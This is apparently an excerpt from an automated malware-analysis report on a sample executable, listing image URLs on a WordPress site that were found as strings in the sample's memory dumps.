              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-300x300.png
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-150x150.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-300x300.png
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLACK-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLUE-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSKIN-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSTROKe-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_2.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_3.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_4.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_5.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_6.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile123.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile234.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile456ENDE.jpg
